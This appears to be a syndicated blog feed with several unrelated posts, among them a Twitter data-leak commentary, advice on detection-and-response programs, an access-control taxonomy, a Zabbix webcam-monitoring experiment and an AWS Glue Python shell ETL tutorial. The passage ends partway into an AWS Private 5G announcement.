In January 2022, we received a report through our bug bounty program of a vulnerability in Twitter’s systems. As a result of the vulnerability, if someone submitted an email address or phone number to Twitter’s systems, Twitter’s systems would tell the person what Twitter account the submitted email addresses or phone number was associated with, if any. This bug resulted from an update to our code in June 2021. When we learned about this, we immediately investigated and fixed it. At that time, we had no evidence to suggest someone had taken advantage of the vulnerability.

In July 2022, we learned through a press report that someone had potentially leveraged this and was offering to sell the information they had compiled. After reviewing a sample of the available data for sale, we confirmed that a bad actor had taken advantage of the issue before it was addressed.

This includes anonymous accounts.

This comment has it right:

So after forcing users to enter a phone number to continue using twitter, despite twitter having no need to know the users phone number, they then leak the phone numbers and associated accounts. Great.

But it gets worse… After being told of the leak in January, rather than disclosing the fact millions of users data had been open for anyone who looked, they quietly fixed it and hoped nobody else had found it.

It was only when the press started to notice they finally disclosed the leak.

That isn’t just one bug causing a security leak—it’s a chain of bad decisions and bad security culture, and if anything should attract government fines for lax data security, this is it.

Twitter’s blog post unhelpfully goes on to say:

If you operate a pseudonymous Twitter account, we understand the risks an incident like this can introduce and deeply regret that this happened. To keep your identity as veiled as possible, we recommend not adding a publicly known phone number or email address to your Twitter account.

Three news articles.

3 Mistakes Companies Make in Their Detection and Response Programs

Post Syndicated from Jake Godgart original https://blog.rapid7.com/2022/08/12/3-mistakes-companies-make-in-their-detection-and-response-programs/

3 Mistakes Companies Make in Their Detection and Response Programs

The goal of a detection and response (D&R) program is to act as quickly as possible to identify and remove threats while minimizing any fallout. Many organizations have identified the need for D&R as a critical piece of their security program, but it’s often the hardest — and most costly — piece to implement and run.

As a result, D&R programs tend to suffer from common mistakes, and security teams often run into obstacles that hamper the value a solid program can deliver.

Recognizing this fact, our team of security experts at Rapid7 has put together a list of the top mistakes companies make in their D&R programs as well as tips to overcome or avoid them entirely.

1. Trying to analyze too much data

To have a successful and truly comprehensive D&R program, you should have complete visibility across your modern environment – from endpoints to users, cloud, network, and all other avenues attackers may enter. With all this visibility, you may think you need all the data you can get your hands on. The reality? Data “analysis paralysis” is real.

While data fuels detection and response, too much of it will leave you wading through thousands of false positives and alert noise, making it hard to focus on the needle in a haystack full of other needles. The more data, the harder it is to understand which of those needles are sharp and which are dull.

So it ends up being about collecting the right data without turning your program into an alert machine. It’s key to understand which event sources to connect to your SIEM or XDR platform and what information is the most relevant. Typically, you’re on the right path if you’re aligning your event sources with use cases. The most impactful event sources we usually see ingested are:

  • Endpoint agents (including start/stop processes)
  • DHCP
  • LDAP
  • DNS
  • Cloud services (O365, IIS, load balancers)
  • VPN
  • Firewall
  • Web proxy
  • Active Directory for user attribution
  • For even greater detail, throw on network sensors, IDS, deception technology, and other log types

At the end of the day, gaining visibility into your assets, understanding user behaviors, collecting system logs, and piecing it all together will help you build a clearer picture of your environment. But analyzing all that data can prove challenging, especially for larger-scale environments.

That’s where Managed Security Service Providers (MSSP) and Managed Detection and Response (MDR) providers can come in to offload that element to a 24×7 team of experts.

2. Not prioritizing risks and outcomes

Not all D&R programs will focus on the same objectives. Different companies have different risks. For example, healthcare providers and retail chains will likely deal with threats unique to their respective industries. Hospitals, in particular, are prime targets for ransomware. Something as simple as not having two-factor authentication in place could leave a privileged account susceptible to a brute-force attack, creating wide-open access to medical records. It’s not overstating to say that could ultimately make it more difficult to save lives.

Taking this into account, your D&R program should identify the risks and outcomes that will directly impact your business. One of the big mistakes companies make is trying to cover all the bases while ignoring more targeted, industry-specific threats.

As mentioned above, healthcare is a heavily targeted industry. Phishing attacks like credential harvesting are extremely common. As we should all know by now, it can be disastrous for even one employee to click a suspicious link or open an attachment in an email. In the healthcare sector, customer and patient data were leaked about 58% of the time, or in about 25 out of 43 incidents. Adversaries can now move laterally with greater ease, quickly escalating privileges and getting what they want faster. And when extortion is the name of the game, the goal is often to disrupt mission-critical business operations. This can cripple a hospital’s ability to run, holding data for ransom and attempting to tarnish a company’s reputation in the process.

3. Finding help in the wrong place

Building a modern security operations center (SOC) today requires significant investments. An internal 24×7 SOC operation essentially needs around a dozen security personnel, a comprehensive security playbook with best practices clearly defined and outlined, and a suite of security tools that all go toward providing 24/7 monitoring. Compound these requirements with the cybersecurity skills shortage, and not many organizations will be able to set up or manage an internal SOC, let alone helm a fully operational D&R program. A recent Forrester Consulting Total Economic Impact™ (TEI) study commissioned by Rapid7 found that Rapid7’s MDR service enabled security teams to avoid hiring five full-time analysts, each at an annual salary of at least $135,000.

There are two critical mistakes organizations make that can send D&R programs down the wrong path:

  • Choosing to go it all alone and set up your own SOC without the right people and expertise
  • Partnering with a provider that doesn’t understand your needs or can’t deliver on what they promise

Partnering with an MDR provider is an effective way to ramp up security monitoring capabilities and fill this gap. But first, it’s important to evaluate an MDR partner across the following criteria:

  • Headcount and expertise: How experienced are the MDR analysts? Does the provider offer alert triage and investigation as well as digital forensics and incident response (DFIR) expertise?
  • Technology: What level of visibility will you have across the environment? And what detection methods will be used to find threats?
  • Collaboration and partnership: What do daily/monthly service interactions look like? Is the provider simply focused on security operations, or will they also help you advance your maturity?
  • Threat hunting: Will they go beyond real-time threat monitoring and offer targeted, human-driven threat hunting for unknown threats?
  • Process and service expectations: How will they help you achieve rapid time-to-value?
  • Managed response and incident response (IR) expertise: How will they respond on your behalf, and what will they do if an incident becomes a breach?
  • Security orchestration, automation, and response (SOAR): Will they leverage SOAR to automate processes?
  • Pricing: Will they price their solution to ensure transparency, predictability, and value?

An extension of your team

Services like MDR can enable you to obtain 24/7, remotely delivered SOC capabilities when you have limited or no existing internal detection and response expertise or need to augment your existing security operations team.

The key questions and critical areas of consideration discussed above can help you find the MDR partner who will best serve your needs — one who will provide the necessary MDR capabilities that can serve your short- and long-term needs. After all, the most important thing is that your organization comes out the other side better protected in the face of today’s threats.

Looking for more key considerations and questions to ask on your D&R journey to keeping your business secure? Check out our 2022 MDR Buyer’s Guide that details everything you need to know about evaluating MDR solutions.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Security updates for Friday

Post Syndicated from original https://lwn.net/Articles/904549/

Security updates have been issued by Debian (gnutls28, libtirpc, postgresql-11, and samba), Fedora (microcode_ctl, wpebackend-fdo, and xen), Oracle (.NET 6.0, galera, mariadb, and mysql-selinux, and kernel), SUSE (dbus-1 and python-numpy), and Ubuntu (booth).

A Taxonomy of Access Control

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/08/a-taxonomy-of-access-control.html

My personal definition of a brilliant idea is one that is immediately obvious once it’s explained, but no one has thought of it before. I can’t believe that no one has described this taxonomy of access control before Ittay Eyal laid it out in this paper. The paper is about cryptocurrency wallet design, but the ideas are more general. Ittay points out that a key—or an account, or anything similar—can be in one of four states:

safe Only the user has access,
loss No one has access,
leak Both the user and the adversary have access, or
theft Only the adversary has access.

Once you know these states, you can assign probabilities of transitioning from one state to another (someone hacks your account and locks you out, you forgot your own password, etc.) and then build optimal security and reliability to deal with it. It’s a truly elegant way of conceptualizing the problem.

What’s Up, Home? – Did You Really Turn Off Your Camera?

Post Syndicated from Janne Pikkarainen original https://blog.zabbix.com/whats-up-home-did-you-really-turn-off-your-camera/22697/

Can you monitor your webcam activity with Zabbix? Of course you can! By day, I work as a monitoring technical lead in a global cyber security company. By night, I monitor my home with Zabbix & Grafana and do some weird experiments with them. Welcome to my weekly blog about this project.

In a world where we work remote and have our web cameras on much of the time, you totally can forget to turn it off (or forget to toggle that physical webcam blindfold). Or, a Bad Hombre can lure something nasty to your computer and silently record your activities with it for any later evil consumption.

Scary, huh? Zabbix to the rescue!

Ssssshhhhh! Be very quiet, I am setting up a trap for uninvited visitors

Underneath, this thing works with a combination of zabbix_sender (spawned on my MacBook) and a Zabbix trapper item …

… with some preprocessing applied to it:

Easy bits first: See, this works!

Here’s the latest data:

Webcam power status latest data

And here’s a graph:

Webcam power status graph

In other words, my Zabbix can now tell if the web camera is on or not. I did not do any triggers for this yet, and for the most part this is just an inspirational post for y’all. Use Zabbix trigger conditions and create alerts such as:

  • Webcam is on but no usual webcam needing software (Teams, Zoom…) is found
  • Webcam is on even if the screen is locked
  • Webcam is on even if user is not logged in
  • Webcam is on in the middle of the night
  • Webcam is on even if nobody is home (according to your IoT monitoring setup)

This easily could add another layer to your security and privacy, as any suspicious usage of web camera (or, with similar technique, a microphone) can be detected in real time.
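As an illustration of the list above, a “webcam is on in the middle of the night” alert could look roughly like the following Zabbix 6.x trigger expression. This assumes the preprocessing step maps the captured log line to 1 (camera on) and 0 (camera off); the host name and item key match the zabbix_sender call shown later in this post:

last(/Personal MacBook Pro/webcam.power)=1 and time()>=000000 and time()<=050000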

Headbang time

So, since I mostly use Mac for any webcam needs, I needed to get this working with a Mac. Unfortunately, as a Mac admin, I wear a yellow belt. For what it’s worth, I have an ancient MacBook Pro Retina mid-2012, running macOS Catalina.

First I thought this would be somehow easy, as I am already forwarding all the macOS syslog entries to my home syslog server (which is just the Raspberry Pi that also runs Zabbix & Grafana). Naive me thought that I could just look for kCameraStreamStart/Stop events via that log.

Little did I know, and this is where I request your help to make this sensible. I can see the log entries on my macOS in real-time with

log stream | grep "kCameraStream"

… but that does not want to save the thing in a log file if I try standard redirection with > or piping to tee or any other command, at least not without specifying a timeout value and then restarting the command.

Then there seems to be /etc/asl.conf and /etc/asl/ directory with many files, but my asl-fu is weak and I have no idea how to make it forward logs to remote syslog. I found out that in theory there’s a file parameter and I could store messages to file, which the standard syslog could then forward to my syslog server…. but I did not try out that route yet.

I know I could get the webcam status by using lsof but the trouble is that if the camera was on just for a very short time, it is possible to miss that with lsof.

For now, I have this terrible, terrible thing running in the background to see if the concept works, and I would like to get rid of it.

while true; do log show --last 2m | grep kCamera | tail -n1 | xargs -I '{}' zabbix_sender -z my.zabbix.server -s "Personal MacBook Pro" -k webcam.power -o '{}' ; sleep 30; done

So, how to make this as smooth as possible with Mac? Basically I just would need to forward more logs to my central log server, but did not yet figure out, how to do that.

I think that with Linux I could detect the use of /dev/video0 via the audit log or set up an incron hook to trigger when /dev/video0 gets accessed, but I'm not totally sure, as these are murky waters for me; I am not usually spying on my webcam.

I have been working at Forcepoint since 2014 and my co-workers have to stand the pain that is my stupid t-shirts.

This post was originally published on the author’s LinkedIn account

The post What’s Up, Home? – Did You Really Turn Off Your Camera? appeared first on Zabbix Blog.

AWS Glue Python shell now supports Python 3.9 with a flexible pre-loaded environment and support to install additional libraries

Post Syndicated from Alunnata Mulyadi original https://aws.amazon.com/blogs/big-data/aws-glue-python-shell-now-supports-python-3-9-with-a-flexible-pre-loaded-environment-and-support-to-install-additional-libraries/

AWS Glue is the central service of an AWS modern data architecture. It is a serverless data integration service that allows you to discover, prepare, and combine data for analytics and machine learning. AWS Glue offers you a comprehensive range of tools to perform ETL (extract, transform, and load) at the right scale. AWS Glue Python shell jobs are designed for running small-to-medium-sized ETL jobs and triggering SQL statements (including long-running queries) on Amazon Redshift, Amazon Athena, Amazon EMR, and more.

Today, we are excited to announce a new release of AWS Glue Python shell that supports Python 3.9 with more pre-loaded libraries. Additionally, it allows you to customize your Python shell environment with pre-loaded libraries and offers you PIP support to install other native or custom Python libraries.

The new release of AWS Glue Python shell includes the necessary Python libraries to connect your script to SQL engines and data warehouses, such as SQLAlchemy, PyMySQL, pyodbc, psycopg2, redshift-connector, and more. It also supports communications with other AWS services such as Amazon OpenSearch Service (opensearch-py, elasticsearch), Amazon Neptune (gremlinpython), or Athena (PyAthena). It integrates the AWS Data Wrangler library (awswrangler) for ETL tasks like loading and unloading data from data lakes, data warehouses, and databases. It also includes library support for data serialization in industry formats such as avro and et-xmlfile.

In this post, we walk you through how to use AWS Glue Python shell to create an ETL job that imports an Excel file and writes it to a relational database and data warehouse. The job reads the Excel file as a Pandas DataFrame, creates a data profiling report, and exports it into your Amazon Simple Storage Service (Amazon S3) bucket. The routine cleans inaccurate information and imputes missing values based on predefined business rules. It writes the data into a target MySQL database for low-latency data access. Additionally, in parallel, the script exports the DataFrame to the data lake in columnar format to be copied into Amazon Redshift for reporting and visualization.

AWS Glue Python shell new features

The new release of AWS Glue Python shell allows you to use new features of Python 3.9 and add custom libraries to your script using job parameter configurations. This gives you more flexibility to write your Python code and reduces the need to manually maintain and update Python libraries needed for your code.

Customized pre-loaded library environments

AWS Glue Python shell for Python 3.9 comes with two library environment options:

  • analytics (default) – You can run your script in a fully pre-loaded environment for complex analytics workloads. This option loads the full package of libraries.
  • none – You can choose an empty environment for simple and fast ETL jobs. This option only loads awscli and botocore as basic libraries.

You can set this option by using the library-set parameter in the job creation, for example:

"library-set":"analytics"

For your reference, the following table lists the libraries included in each option (a dot indicates that the library is not included in the none environment).

Python version Python 3.9
Library set analytics (default) none
avro 1.11.0 .
awscli 1.23.5 1.23.5
awswrangler 2.15.1 .
botocore 1.23.5 1.23.5
boto3 1.22.5 .
elasticsearch 8.2.0 .
numpy 1.22.3 .
pandas 1.4.2 .
psycopg2 2.9.3 .
pyathena 2.5.3 .
PyMySQL 1.0.2 .
pyodbc 4.0.32 .
pyorc 0.6.0 .
redshift-connector 2.0.907 .
requests 2.27.1 .
scikit-learn 1.0.2 .
scipy 1.8.0 .
SQLAlchemy 1.4.36 .
s3fs 2022.3.0 .

Added support for library compilers

In this release, you can import and install libraries as part of the script, including your own C-based libraries. You have PIP support to install native or customer-provided Python libraries with the support of the following compilers:

  • gcc
  • gcc-c++
  • gmake
  • cmake
  • cython
  • boost-devel
  • conda
  • python-dev

If you want to include a new package during your job creation, you can add the job parameter --additional-python-modules followed by the name of the library and the version. For example:

"--additional-python-modules":"boto3=1.22.13"

How to use the new features with the AWS Glue Python shell script

Now that we have introduced the new features, let’s create a Python 3.9 job with additional libraries with AWS Glue Python shell. You have two options to create and submit a job: you can use the interface of AWS Glue Studio, or the AWS Command Line Interface (AWS CLI) for a programmatic approach.

AWS Glue Studio

To use AWS Glue Studio, complete the following steps:

  1. On the AWS Glue Studio console, create a new job and select Python Shell script editor.
  2. Enter a job name and enter your Python script.
  3. On the Job details tab, enter an optional description.
  4. For IAM role, choose your job role.
  5. For Python version, choose Python 3.9.
  6. Select Load common Python libraries.
  7. Choose the script and the temporary files locations.
  8. Include the additional libraries as job parameters (--additional-python-modules).

AWS CLI

With the new release, you can now use the AWS CLI with the new parameters. The following is an example of an AWS CLI statement to create the AWS Glue Python shell script job with Python 3.9:

$ aws glue create-job \
--name <job_name> \
--role <glue_role> \
--command Name=pythonshell,PythonVersion=3.9,ScriptLocation=s3://<path_to_your_python_script>.py \
--default-arguments \
'{
    "--TempDir":"s3://<path_to_your_temp_dir>",
    "--job-language":"python",
    "library-set":"<analytics/none>",
    "--additional-python-modules":"<python package>=<version>, <>=<>"
}' \
--connections <your_glue_connection> \
--timeout 30 \
--max-capacity 0.0625

Let’s explore the main differences from the previous AWS Glue Python shell versions:

  • Set the option PythonVersion within the --command parameter to 3.9.
  • To add new libraries, use --additional-python-modules as a new parameter and then list the library and the required version as follows: boto3=1.22.13.
  • Include library-set within --default-arguments and choose one of the values (analytics or none).

Solution overview

This tutorial demonstrates the new features using a common use case where data flows into your system as spreadsheet files reports. In this case, you want to quickly orchestrate a way to serve this data to the right tools. This script imports the data from Amazon S3 into a Pandas DataFrame. It creates a profiling report that is exported into your S3 bucket as an HTML file. The routine cleans inaccurate information and imputes missing values based on predefined business rules. It writes the data directly from Python shell to an Amazon Relational Database Service (Amazon RDS) for MySQL server for low-latency app response. Additionally, it exports the data into a Parquet file and copies it into Amazon Redshift for visualization and reporting.

In our case, we treat each scenario as an independent task, with no dependency between them. You only need to create the infrastructure for the use cases that you want to test. Each section provides guidance and links to the documentation to set up the necessary infrastructure.

Prerequisites

There are a few requirements that are common to all scenarios:

  1. Create an S3 bucket to store the input and output files, script, and temporary files.

    Then, we create the AWS Identity and Access Management (IAM) user and role necessary to create and run the job.
  2. Create an IAM AWS Glue service role called glue-blog-role and attach the AWS managed policy AWSGlueServiceRole for general AWS Glue permissions. If you're also testing an Amazon Redshift or Amazon RDS use case, you need to grant the necessary permissions to this role. For more information, refer to Using identity-based policies (IAM policies) for Amazon Redshift and Identity-based policy examples for Amazon RDS.
  3. Create an IAM user with security credentials and configure your AWS CLI in your local terminal.
    This allows you to create and launch your scripts from your local terminal. It is recommended to create a profile associated with this configuration.

    $ aws configure --profile glue-python-shell
    AWS Access Key ID
    AWS Secret Access Key
    Default region name
    Default output format

    The dataset used in this example is an Excel file containing Amazon Video Review data with the following structure. In a later step, we place the Excel file in our S3 bucket to be processed by our ETL script.

  4. Finally, to work with sample data, we need four Python modules that were made available in AWS Glue Python shell when the parameter library-set is set to analytics:
    1. boto3
    2. awswrangler
    3. PyMySQL
    4. Pandas

Note that Amazon customer reviews are not licensed for commercial use. You should replace this data with your own authorized data source when implementing your application.

Load the data

In this section, you start writing the script by loading the data used in all the scenarios.

  1. Import the libraries that we need:
    import sys
    import io
    import os
    import boto3
    import pandas as pd
    import awswrangler as wr
    import pymysql
    import datetime
    from io import BytesIO

  2. Read the Excel spreadsheet into a DataFrame:
    AWS_S3_BUCKET = <your_s3_bucket_uri>
    s3 = boto3.resource(
        service_name='s3',
        region_name='<your_s3_region>' 
    )
    obj = s3.Bucket(AWS_S3_BUCKET).Object('amazon_reviews_us_Video.xlsx').get()
    df = pd.read_excel(io.BytesIO(obj['Body'].read()))
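
    Alternatively, a minimal sketch using awswrangler can read the spreadsheet in one call (this assumes the openpyxl engine is available in the environment; if it isn't, add it via --additional-python-modules):

    #read the Excel file directly from S3 into a Pandas DataFrame
    df = wr.s3.read_excel("s3://<your_s3_bucket>/amazon_reviews_us_Video.xlsx")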

Scenario 1: Data profiling and dataset cleaning

To assist with basic data profiling, we use the pandas-profiling module and generate a profile report from our Pandas DataFrame. Pandas profiling supports output files in JSON and HTML format. In this post, we generate an HTML output file and place it in an S3 bucket for quick data analysis.

To use this new library during the job, add the --additional-python-modules parameter from the job details page in AWS Glue Studio or during job creation from the AWS CLI. Remember to include this package in the imports of your script:

from pandas_profiling import ProfileReport
…
profile = ProfileReport(df)
s3.Object(AWS_S3_BUCKET,'output-profile/profile.html').put(Body=profile.to_html())

A common problem that we often see when dealing with column data types is that a mix of data types in one column is identified as object in a Pandas DataFrame. Mixed data type columns are flagged by pandas-profiling as an Unsupported type and stored in the profile report description. We can access that information and standardize the columns to our desired data types.

The following lines of code loop every column in the DataFrame and check if any of the columns are flagged as Unsupported by pandas-profiling. We then cast it to string:

for col in df.columns:
    if (profile.description_set['variables'][col]['type']) == 'Unsupported':
        df[col] = df[col].astype(str)

To further clean or process your data, you can access variables provided by pandas-profiling. The following example prints out all columns with missing values:

for col in df.columns:
    if profile.description_set['variables'][col]['n_missing'] > 0:
        print (col, " is missing ", profile.description_set['variables'][col]['n_missing'], " data type ", profile.description_set['variables'][col]['type'])
        #missing data handling
        #....
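
For example, a minimal imputation sketch (the rules below are illustrative assumptions rather than the actual business rules; the column names come from the dataset used in this post):

#default missing vote counts to zero
df['helpful_votes'] = df['helpful_votes'].fillna(0)
df['total_votes'] = df['total_votes'].fillna(0)
#drop rows without a review date, because review_date is used later for partitioning
df = df.dropna(subset=['review_date'])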

Scenario 2: Export data in columnar format and copy it to Amazon Redshift

In this scenario, we export our DataFrame into Parquet columnar format, store it in Amazon S3, and copy it to Amazon Redshift. We use Data Wrangler to connect our script to Amazon Redshift. This Python module is already included in the analytics environment. Before proceeding, set up the necessary infrastructure: an Amazon Redshift cluster and an AWS Glue connection that points to it (the connection name is used later to open the Data Wrangler connection).

Now we can write raw data to Amazon S3 in Parquet format and to Amazon Redshift.

A common partition strategy is to divide rows by year, month, and day from your date column and apply multi-level partitioning. This approach allows fast and cost-effective retrieval for all rows assigned to a particular year, month, or date. Another strategy is to partition by a specific column directly. For example, using review_date as a partition gives you a single level of directories, one for every unique date, and stores the corresponding data in it.

In this post, we prepare our data for the multi-level date partitioning strategy. We start by extracting year, month, and day from our date column:

df['day']= pd.DatetimeIndex(df['review_date']).day.astype(str)
df['month']= pd.DatetimeIndex(df['review_date']).month.astype(str)
df['year']= pd.DatetimeIndex(df['review_date']).year.astype(str)

With our partition columns ready, we can use the awswrangler module to write to Amazon S3 in Parquet format:

wr.s3.to_parquet(
    df=df,
    path="s3://<your_output_s3_bucket>", #change this value with path to your bucket
    dataset=True,
    mode="overwrite",       
    partition_cols=['year','month','day']

To query your partitioned data in Amazon S3, you can use Athena, our serverless interactive query service. For more information, refer to Partitioning data with Athena.
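
For example, a quick sketch using the awswrangler Athena helper that is already part of the analytics environment (the database and table names are placeholders, and the table is assumed to be registered in the AWS Glue Data Catalog):

#query one month of the partitioned dataset via Athena
df_jan_2015 = wr.athena.read_sql_query(
    sql="SELECT * FROM <your_table> WHERE year='2015' AND month='1'",
    database="<your_glue_database>"
)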

Next, we write our DataFrame directly to Amazon Redshift internal storage by using Data Wrangler. Writing to Amazon Redshift internal storage is advised when you’re going to use this data frequently for complex analytics, large SQL operations, or business intelligence (BI) reporting. In Amazon Redshift, it’s advised to define the distribution style and sort key on the table to improve cluster performance. If you’re not sure about the right value for those parameters, you can use the Amazon Redshift auto distribution style and sort key and follow Amazon Redshift advisor recommendations. For more information on Amazon Redshift data distribution, refer to Working with data distribution styles.

#drop review columns and preserve other columns for analysis
df = df.drop(['review_body','review_headline'], axis=1)

#generate dictionary with length to be used by awswrangler to create varchar columns
max_length_object_cols = {col: df.loc[:, col].astype(str).apply(len).max() for col in df.select_dtypes([object]).columns}

#connect to Redshift via Glue connection
con = wr.redshift.connect("<your_glue_connection>")

#copy DataFrame into Redshift table 
wr.redshift.copy(
    df=df,
    path="<temporary_path_for_staging_files>",
    con=con,
    table="<your_redshift_table_name>", #awswrangler will create the table if it does not exist
    schema="<your_redshift_schema>",
    mode="overwrite",
    iam_role="<your_iam_role_arn_with_permission_to_redshift>",
    varchar_lengths=max_length_object_cols,
    diststyle="AUTO",
)
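
#optional sanity check before closing the connection (a sketch; it reuses the
#placeholder schema and table names from the copy call above)
row_count = wr.redshift.read_sql_query(
    sql="SELECT COUNT(*) FROM <your_redshift_schema>.<your_redshift_table_name>",
    con=con
)
print(row_count)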

#close connection    
con.close()

Scenario 3: Data ingestion into Amazon RDS

In this scenario, we open a connection from AWS Glue Python shell to Amazon RDS for MySQL and ingest the data directly. The infrastructure you require for this scenario is an RDS for MySQL database in the same Region as the AWS Glue Python shell job. For more information, refer to Creating a MySQL DB instance and connecting to a database on a MySQL DB instance.

With the PyMySQL and boto3 modules, we can now connect to our RDS for MySQL database and write our DataFrame into a table.

Prepare the variables for connection and generate a database authentication token for database login:

#RDS connection details
MYSQL_ENDPOINT = "<mysql_endpoint>"
PORT= "3306"
USER= "<mysql_username>"
REGION = "<region_for_rds_mysql>"
DBNAME = "<database_name>"
session = boto3.Session(profile_name='<your_aws_profile>')
client = session.client('rds')

#generate db authentication token 
token = client.generate_db_auth_token(DBHostname=MYSQL_ENDPOINT, Port=PORT, DBUsername=USER, Region=REGION)

#connect to database
connection = pymysql.connect(host=MYSQL_ENDPOINT,
    user=USER,
    password=token,
    db=DBNAME,
    ssl_ca='global-bundle.pem')
    
#arrange columns and value placeholders for the SQL insert statement
columns = ','.join(df.columns)
values = ','.join(['%s'] * len(df.columns))

#SQL statement to insert into RDS
load_sql = f"INSERT INTO demo_blog.amazon_video_review({columns}) VALUES ({values})"

For more information about using an SSL connection with your RDS instance, refer to Using SSL/TLS to encrypt a connection to a DB instance.
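
The global-bundle.pem file referenced in the connection code can be downloaded once from the certificate bundle that AWS publishes for RDS (a minimal sketch; verify the URL against the RDS documentation for your setup):

import urllib.request

#download the region-agnostic RDS CA bundle next to the script
urllib.request.urlretrieve(
    "https://truststore.pki.rds.amazonaws.com/global/global-bundle.pem",
    "global-bundle.pem"
)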

Connect to your RDS for MySQL database and write a Pandas DataFrame into the table with the following code:

try:
    with connection.cursor() as cur:
        cur.executemany(load_sql, df.values.tolist())
    connection.commit()
finally:
    cur.close()

You need to create a table in Amazon RDS for MySQL prior to running the insert statement. Use the following DDL to create the demo_blog.amazon_video_review table:

CREATE TABLE `amazon_video_review` (
  `marketplace` varchar(100) NOT NULL,
  `customer_id` bigint NOT NULL,
  `review_id` varchar(100) DEFAULT NULL,
  `product_id` varchar(100) DEFAULT NULL,
  `product_parent` bigint NOT NULL,
  `product_title` varchar(100) DEFAULT NULL,
  `product_category` varchar(100) DEFAULT NULL,
  `star_rating` bigint NOT NULL,
  `helpful_votes` bigint NOT NULL,
  `total_votes` bigint NOT NULL,
  `vine` varchar(100) DEFAULT NULL,
  `verified_purchase` varchar(100) DEFAULT NULL,
  `review_headline` varchar(100) DEFAULT NULL,
  `review_body` varchar(5000) DEFAULT NULL,
  `review_date` date NOT NULL,
  `year` varchar(100) DEFAULT NULL,
  `month` varchar(100) DEFAULT NULL,
  `date` varchar(100) DEFAULT NULL,
  `day` varchar(100) DEFAULT NULL
)

When the data is available in the database, you can perform a simple aggregation as follows:

agg_sql="insert into demo_blog.video_review_recap select product_title , year as review_year, count(*) as total_review, sum(case when verified_purchase=\"Y\" then 1 else 0 end) as total_verified_purchase,sum(case when verified_purchase=\"N\" then 1 else 0 end) as total_unverified_purchase from demo_blog.amazon_video_review avr group by 1 order by 2 DESC"
cursor = connection.cursor()
cursor.execute(agg_sql)
connection.commit()

Create and run your job

After you finalize your code, you can run it from AWS Glue Studio or save it in a script .py file and submit a job with the AWS CLI. Remember to add the necessary parameters in your job creation depending on the scenario you're testing. The following job parameters cover all the scenarios:

--command PythonVersion=3.9 …
--default-arguments '{"library-set":"analytics" , "--additional-python-modules":"pandas_profiling", …}'
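
After the job exists, you can also start a run programmatically. The following is a minimal boto3 sketch (the job name is a placeholder):

import boto3

glue = boto3.client('glue')

#start a run of the Python shell job created above
response = glue.start_job_run(JobName='<job_name>')
print(response['JobRunId'])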

Review the results

In this section, we review the expected results for each scenario.

In Scenario 1, pandas-profiling generates a data report in HTML format. In this report, you can visualize missing values, duplicated values, size estimations, or correlations between columns, as shown in the following screenshots.

For Scenario 2, you can first review the Parquet files written to Amazon S3 with the year/month/day partitioning.

Then you can use the Amazon Redshift query editor to query and visualize the data.

For Scenario 3, you can use a JDBC connection or database IDE to connect to your RDS database and query the data that you just ingested.

Clean up

AWS Glue Python shell is a serverless routine that won't incur any extra charges when it isn't running. However, this demo used several services that will incur extra costs. Clean up after completing this walkthrough with the following steps:

  1. Remove the contents of your S3 bucket and delete it. If you encounter any errors, refer to Why can’t I delete my S3 bucket using the Amazon S3 console or AWS CLI, even with full or root permissions.
  2. Stop and delete the RDS DB instance. For instructions, see Deleting a DB instance.
  3. Stop and delete the Amazon Redshift cluster. For instructions, refer to Deleting a cluster.

Conclusion

In this post, we introduced AWS Glue Python shell with Python 3.9 support and more pre-loaded libraries. We presented the customizable Python shell environment with pre-loaded libraries and PIP support to install other native or custom Python libraries. We covered the new features and how to get started through AWS Glue Studio and the AWS CLI. We also demonstrated a step-by-step tutorial of how you can easily use these new capabilities to accomplish common ETL use cases.

To learn more about AWS Glue Python shell and this new feature, refer to Python shell jobs in AWS Glue.


About the authors

Alunnata Mulyadi is an Analytics Specialist Solutions Architect at AWS. Alun has over a decade of experience in data engineering, helping customers address their business and technical needs. Outside of the work, he enjoys photography, cycling, and basketball.

Quim Bellmunt is an Analytics Specialist Solutions Architect at Amazon Web Services. Quim has a PhD in Computer Science and Knowledge Graph focusing on data modeling and transformation. With over 6 years of hands-on experience in the analytics and AI/ML space, he enjoys helping customers create systems that scale with their business needs and generate value from their data. Outside of the work, he enjoys walking with his dog and cycling.

Kush Rustagi is a Software Development Engineer on the AWS Glue team with over 4 years of experience in the industry having worked on large-scale financial systems in Python and C++, and is now using his scalable system design experience towards cloud development. Before working on Glue Python Shell, Kush worked on anomaly detection challenges in the fin-tech space. Aside from exploring new technologies, he enjoys EDM, traveling, and learning non-programming languages.

New – AWS Private 5G – Build Your Own Private Mobile Network

Post Syndicated from Jeff Barr original https://aws.amazon.com/blogs/aws/new-aws-private-5g-build-your-own-private-mobile-network/

Back in the mid-1990’s, I had a young family and 5 or 6 PCs in the basement. One day my son Stephen and I bought a single box that contained a bunch of 3COM network cards, a hub, some drivers, and some cables, and spent a pleasant weekend setting up our first home LAN.

Introducing AWS Private 5G
Today I would like to introduce you to AWS Private 5G, the modern, corporate version of that very powerful box of hardware and software. This cool new service lets you design and deploy your own private mobile network in a matter of days. It is easy to install, operate, and scale, and does not require any specialized expertise. You can use the network to communicate with the sensors & actuators in your smart factory, or to provide better connectivity for handheld devices, scanners, and tablets for process automation.

The private mobile network makes use of CBRS spectrum. It supports 4G LTE (Long Term Evolution) today, and will support 5G in the future, both of which give you a consistent, predictable level of throughput with ultra low latency. You get long range coverage, indoors and out, and fine-grained access control.

AWS Private 5G runs on AWS-managed infrastructure. It is self-service and API-driven, and can scale with respect to geographic coverage, device count, and overall throughput. It also works nicely with other parts of AWS, and lets you use AWS Identity and Access Management (IAM) to control access to both devices and applications.

Getting Started with AWS Private 5G
To get started, I visit the AWS Private 5G Console and click Create network:

I assign a name to my network (JeffCell) and to my site (JeffSite) and click Create network:

The network and the site are created right away. Now I click Create order:

I fill in the shipping address, agree to the pricing (more on that later), and click Create order:

Then I await delivery, and click Acknowledge order to proceed:

The package includes a radio unit and ten SIM cards. The radio unit requires AC power and wired access to the public Internet, along with basic networking (IPv4 and DHCP).

When the order arrives, I click Acknowledge order and confirm that I have received the desired radio unit and SIMs. Then I engage a Certified Professional Installer (CPI) to set it up. As part of the installation process, the installer will enter the latitude, longitude, and elevation of my site.

Things to Know
Here are a couple of important things to know about AWS Private 5G:

